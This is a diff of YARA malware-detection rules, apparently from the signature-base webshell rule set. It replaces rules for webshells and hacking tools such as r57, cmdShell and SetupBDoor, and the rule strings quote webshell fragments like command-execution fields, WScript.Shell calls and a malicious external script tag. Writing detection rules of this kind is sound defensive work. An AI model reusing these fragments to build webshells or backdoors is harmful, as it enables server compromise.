+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8823-L8835"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "205ecda66c443083403efb1e5c7f7878"
-		logic_hash = "d0482607f7d9cf6c89963cb9b1f943fa0b80636e857e0fb044cd9a0b3f974deb"
+		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
+		logic_hash = "45e8938ce34fd5a253cee3867aa8c4429c6bf3fcc91098ed9df3f95656bc5f8f"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
+		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
+		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Byshell063_Ntboot
+rule SIGNATURE_BASE_Bin_Wuaus
 {
 	meta:
-		description = "Webshells Auto-generated - file ntboot.exe"
+		description = "Webshells Auto-generated - file wuaus.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d1f39f6-04f1-51ee-b125-c35af8ae4c0c"
+		id = "50b5323b-d8d1-5350-bf93-8dde3d11fd87"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7839-L7853"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8836-L8852"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
-		logic_hash = "2fdc930eacb87d02ebe69a2b64df4103bd0f3417a76f1b2922b3d4cd4c0dffe9"
+		hash = "46a365992bec7377b48a2263c49e4e7d"
+		logic_hash = "0509ca39662430c3ababf65ca3a6e9af95250163980829d90eddf5341168c864"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
-		$s1 = "Failure ... Access is Denied !"
-		$s2 = "Dumping Description to Registry..."
-		$s3 = "Opening Service .... Failure !"
+		$s1 = "9(90989@9V9^9f9n9v9"
+		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
+		$s3 = ";(=@=G=O=T=X=\\="
+		$s4 = "TCP Send Error!!"
+		$s5 = "1\"1;1X1^1e1m1w1~1"
+		$s8 = "=$=)=/=<=Y=_=j=p=z="
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Casus15_2
+rule SIGNATURE_BASE_Pwreveal
 {
 	meta:
-		description = "Webshells Auto-generated - file casus15.php"
+		description = "Webshells Auto-generated - file pwreveal.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3f67fe9-a93f-504a-8b14-a815135d562f"
+		id = "3d79dd13-9012-56e2-b42a-e6b3e204c601"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7854-L7865"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8853-L8867"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8d155b4239d922367af5d0a1b89533a3"
-		logic_hash = "45820e0398cca8e75fc4acf6863d962a817afd95a4592acd4ac4a50029684220"
+		hash = "b4e8447826a45b76ca45ba151a97ad50"
+		logic_hash = "01c9582897c65e608d49a151fe9ade97b9a031d7d10f5fd4b4d0c2a3fd83e7b6"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "copy ( $dosya_gonder"
+		$s0 = "*<Blank - no es"
+		$s3 = "JDiamondCS "
+		$s8 = "sword set> [Leith=0 bytes]"
+		$s9 = "ION\\System\\Floating-"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Installer
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Xwhois
 {
 	meta:
-		description = "Webshells Auto-generated - file installer.cmd"
+		description = "Webshells Auto-generated - file xwhois.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "681d8284-55e5-5316-a0d2-f4f13218df76"
+		id = "8f3b3bb2-5884-584a-8220-b6edbfebc8a3"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7866-L7878"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8868-L8882"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a507919ae701cf7e42fa441d3ad95f8f"
-		logic_hash = "73c1032313155ceb752fe2f94c8d242833127fe0443d7e3044fa1de2b2b7742b"
+		hash = "0bc98bd576c80d921a3460f8be8816b4"
+		logic_hash = "75ee56dae5fde75ae4dc4bba835a96016781b747f3cff0dc6d52e665463a6070"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Restore Old Vanquish"
-		$s4 = "ReInstall Vanquish"
+		$s1 = "rting! "
+		$s2 = "aTypCog("
+		$s5 = "Diamond"
+		$s6 = "r)r=rQreryr"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Remview_2
+rule SIGNATURE_BASE_Vanquish_2
 {
 	meta:
-		description = "Webshells Auto-generated - file remview.php"
+		description = "Webshells Auto-generated - file vanquish.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8e0492e8-d683-5c2d-b1ce-6c8344b874af"
+		id = "6736cad6-cba1-5b6f-ae05-e2b980280479"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7879-L7891"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8883-L8894"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b4a09911a5b23e00b55abe546ded691c"
-		logic_hash = "0a682431f7044e9a49c8dd4842a22c521e2a07d5df045b0a12449e3b3206716b"
+		hash = "2dcb9055785a2ee01567f52b5a62b071"
+		logic_hash = "428dc4e6d8bcc888e6f99f69ee9f211aa029d3486b99b9716d09709dc391d9a2"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<xmp>$out</"
-		$s1 = ".mm(\"Eval PHP code\")."
+		$s2 = "Vanquish - DLL injection failed:"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_R57
+rule SIGNATURE_BASE_Down_Rar_Folder_Down
 {
 	meta:
-		description = "Webshells Auto-generated - file r57.php"
+		description = "Webshells Auto-generated - file down.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "14092413-27a4-5b7d-9023-0b53b3d45a12"
+		id = "4e0a0e03-4f01-5b58-807c-0934cdda77ab"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7892-L7903"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8895-L8906"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "903908b77a266b855262cdbce81c3f72"
-		logic_hash = "8d0f3b2009594d4aa413c4794dca12e3c66a19974cc6d0b47cc3f5e2572a4c57"
+		hash = "db47d7a12b3584a2e340567178886e71"
+		logic_hash = "bc666d6333d49a2b01553e1946fc304195193b9be92e26805474e64da61455da"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
+		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X
+rule SIGNATURE_BASE_Cmdshell
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006X.exe"
+		description = "Webshells Auto-generated - file cmdShell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		id = "be256fc4-8dc5-58e4-9ca2-5a1df936b8dd"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7904-L7916"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8907-L8918"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
-		logic_hash = "b71cf90900c7eae4caef57564292ca497a2c6c77e3de2994ba9e4cecae7f2697"
+		hash = "8a9fef43209b5d2d4b81dfbb45182036"
+		logic_hash = "5e7c7537b355b162d58b8bce570b1f94a8e6b479856685a245ffaed8f9482680"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
-		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
+		$s1 = "if cmdPath=\"wscriptShell\" then"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Phvayv_2
+rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Nc
 {
 	meta:
-		description = "Webshells Auto-generated - file phvayv.php"
+		description = "Webshells Auto-generated - file nc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bd52f9b-a232-566d-90ab-4085933cdc65"
+		id = "106209fc-f957-5131-825b-8eb7835625e0"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7917-L7928"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8919-L8933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "205ecda66c443083403efb1e5c7f7878"
-		logic_hash = "11418a11692412ccb309983bdadd9bda2b27b692c3282eb0386094e76c7ba1e0"
+		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
+		logic_hash = "6106758aedb33f8983f387a58fcd815c47f793cd2a7ea3b0ebed13dd1d5b6e83"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
+		$s0 = "WSOCK32.dll"
+		$s1 = "?bSUNKNOWNV"
+		$s7 = "p@gram Jm6h)"
+		$s8 = "ser32.dllCONFP@"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Elmaliseker
+rule SIGNATURE_BASE_Portlessinst
 {
 	meta:
-		description = "Webshells Auto-generated - file elmaliseker.asp"
+		description = "Webshells Auto-generated - file portlessinst.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
+		id = "c641c522-7844-5002-8ae7-4aaf60d1337d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7929-L7941"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8934-L8947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ccf48af0c8c09bbd038e610a49c9862e"
-		logic_hash = "54c0b8e74a9b10fe54901c0595600af1dfc54abd3f710fc20ca87ca92236bb49"
+		hash = "74213856fc61475443a91cd84e2a6c2f"
+		logic_hash = "72ca80de2ad2048d1fcbbffeebd0e4fd7d9d47d6736360674e6a85ef9943abe8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "javascript:Command('Download'"
-		$s5 = "zombie_array=array("
+		$s2 = "Fail To Open Registry"
+		$s3 = "f<-WLEggDr\""
+		$s6 = "oMemoryCreateP"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Resolve
+rule SIGNATURE_BASE_Setupbdoor
 {
 	meta:
-		description = "Webshells Auto-generated - file resolve.exe"
+		description = "Webshells Auto-generated - file SetupBDoor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcdb9952-63fc-57a7-ae17-ffe8ac4271f1"
+		id = "055ff783-fa9f-5037-a3d6-88b58ec1612f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7942-L7959"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8948-L8959"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "69bf9aa296238610a0e05f99b5540297"
-		logic_hash = "39d8ac274e94f13b5eb197be5827a95ac09df70793bd584c96b81983a565c1ce"
+		hash = "41f89e20398368e742eda4a3b45716b6"
+		logic_hash = "b4b6a0e4b9f8975d769d340a420af37dbc344d32c72447a8c56b05e985e6d806"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "3^n6B(Ed3"
-		$s1 = "^uldn'Vt(x"
-		$s2 = "\\= uPKfp"
-		$s3 = "'r.axV<ad"
-		$s4 = "p,modoi$=sr("
-		$s5 = "DiamondC8S t"
-		$s6 = "`lQ9fX<ZvJW"
+		$s1 = "\\BDoor\\SetupBDoor"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Remexp
+rule SIGNATURE_BASE_Phpshell_3
 {
 	meta:
-		description = "Webshells Auto-generated - file RemExp.asp"
+		description = "Webshells Auto-generated - file phpshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48a262bf-7f48-5ed9-b043-80e9d563bf21"
+		id = "2f0ddfef-b3b5-592b-a9fb-fae4d825d0af"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7960-L7973"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8960-L8972"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b69670ecdbb40012c73686cd22696eeb"
-		logic_hash = "b9b966a89ab097494d7af90775bf124f1310c77145be67fa57ebdacd0164e3d0"
+		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
+		logic_hash = "b86fa40fd7bbcae86926182882faa226530e44c20bc611b8433a7da7f012106c"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
-		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
-		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
+		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
+		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Tool
+rule SIGNATURE_BASE_BIN_Server
 {
 	meta:
-		description = "Webshells Auto-generated - file tool.asp"
+		description = "Webshells Auto-generated - file Server.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed744aa4-7a35-57d6-89bd-3286a21b50a0"
+		id = "1625b0ee-5f9f-57d8-8333-f175f46d6c59"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7974-L7985"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8973-L8989"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3a1e1e889fdd974a130a6a767b42655b"
-		logic_hash = "a3449aca3124aa4d920d78e5e674ddd9d8a181b0ce0143032352a69dfdbcad2d"
+		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
+		logic_hash = "34f9d78e0f61717fae2945e7a833c2c6d59e28035ee95da2c5d32b4e196bc957"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
+		$s0 = "configserver"
+		$s1 = "GetLogicalDrives"
+		$s2 = "WinExec"
+		$s4 = "fxftest"
+		$s5 = "upfileok"
+		$s7 = "upfileer"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_2005
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
+		description = "Webshells Auto-generated - file 2006.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91d278d5-e9ec-5a28-9a54-4549b4f0cd07"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7986-L7998"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8990-L9001"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
-		logic_hash = "4d04174b23c9057acf2618c01cd702eaaec2d3508a8c25dd87fdd320c076a3b1"
+		hash = "c19d6f4e069188f19b08fa94d44bc283"
+		logic_hash = "536232bbdd21bddb88eefe06a82927abcdd3ed10404c052957896960a6d10932"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
-		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
+		$s6 = "strBackDoor = strBackDoor "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Byloader
+rule SIGNATURE_BASE_R57Shell_3
 {
 	meta:
-		description = "Webshells Auto-generated - file byloader.exe"
+		description = "Webshells Auto-generated - file r57shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24940e4b-06eb-548d-9e14-1a8f9c864bd3"
+		id = "4129d77c-2981-587b-a83e-8767dc3a48d8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7999-L8014"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9002-L9013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0f0d6dc26055653f5844ded906ce52df"
-		logic_hash = "66c900e4bc771fb23d7623e57ad51edaa95696c2e31554720582f3e33a1b2e25"
+		hash = "87995a49f275b6b75abe2521e03ac2c0"
+		logic_hash = "0fdca080c7ce57b7bd818a968840aebf3c5c74f188ed062fec794bfadb4e75b0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
-		$s1 = "Failure ... Access is Denied !"
-		$s2 = "NTFS Disk Driver Checking Service"
-		$s3 = "Dumping Description to Registry..."
-		$s4 = "Opening Service .... Failure !"
+		$s1 = "<b>\".$_POST['cmd']"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Fport
+rule SIGNATURE_BASE_Hdconfig
 {
 	meta:
-		description = "Webshells Auto-generated - file Fport.exe"
+		description = "Webshells Auto-generated - file HDConfig.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "664e7b19-4d0b-5062-97d2-0eb34869024d"
+		id = "6f743137-e85a-5298-b51e-c8792e507d28"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8015-L8027"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9014-L9029"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
-		logic_hash = "b9dc66e249c0577839cc3748f129c343d2ccb7327b92a2a67e4467782d10a25e"
-		score = 75
-		quality = 85
+		hash = "7d60e552fdca57642fd30462416347bd"
+		logic_hash = "9001f79db15548cf3ca931d0043d078db7d900ab26093afbf5cd44d0a85800f4"
+		score = 60
+		quality = 55
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "Copyright 2000 by Foundstone, Inc."
-		$s5 = "You must have administrator privileges to run fport - exiting..."
+		$s0 = "An encryption key is derived from the password hash. "
+		$s3 = "A hash object has been created. "
+		$s4 = "Error during CryptCreateHash!"
+		$s5 = "A new key container has been created."
+		$s6 = "The password has been added to the hash. "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Backdoor__Fr_
+rule SIGNATURE_BASE_FSO_S_Ajan_2
 {
 	meta:
-		description = "Webshells Auto-generated - file BackDooR (fr).php"
+		description = "Webshells Auto-generated - file ajan.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd0c77e8-18b7-5eb4-8ed4-87ee4c864683"
+		id = "a66c34ed-0ae2-5e04-bfc4-c82583c5e066"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8028-L8039"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9030-L9042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a79cac2cf86e073a832aaf29a664f4be"
-		logic_hash = "6c16c200712015eed71aeb119e46bad5f93445a8f719d98ef31f9012cb3551ae"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+		logic_hash = "0ac31ee735c94289932369dfba5b408cbf71cc23fd48ce3e09dc7ce640a0d733"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
+		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
+		$s3 = "/file.zip"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Ntdaddy
+rule SIGNATURE_BASE_Webshell_And_Exploit_CN_APT_HK : WEBSHELL
 {
 	meta:
-		description = "Webshells Auto-generated - file ntdaddy.asp"
+		description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6b655b8-7bce-5fa5-97b7-a020a7e53f4f"
-		date = "2025-03-29"
+		id = "eb37a22b-4e8a-5986-bd47-4ef5b4986f47"
+		date = "2014-10-10"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8040-L8051"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9044-L9059"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
-		logic_hash = "4df6f53ee9bfc0214e69dd858878026e962b90573ed48a5ffdd5523538e8f3bf"
-		score = 75
+		logic_hash = "ec3f1e985585e1bf77a46e971a20cd127064a64467761a5a570548dd63ec57e2"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "WEBSHELL"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
+		$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+		$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
+		$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
 
 	condition:
-		all of them
+		$a0 or ( all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Nstview_Nstview
+rule SIGNATURE_BASE_JSP_Browser_APT_Webshell
 {
 	meta:
-		description = "Webshells Auto-generated - file nstview.php"
+		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
 		author = "Florian Roth (Nextron Systems)"
-		id = "00df601c-bddb-5da8-bef4-d2122419b5d0"
-		date = "2025-03-29"
+		id = "06988b5b-ec8b-5a10-b659-3e846057ea51"
+		date = "2014-10-10"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8052-L8063"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9061-L9075"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3871888a0c1ac4270104918231029a56"
-		logic_hash = "2b25e22d86a672af0b8957f1b0336ed80e09f3389f5045c230af2372db0e3415"
-		score = 75
+		logic_hash = "a352bf394f1b4f70218650758db39225a5a505656299405ccd077592d29480a7"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
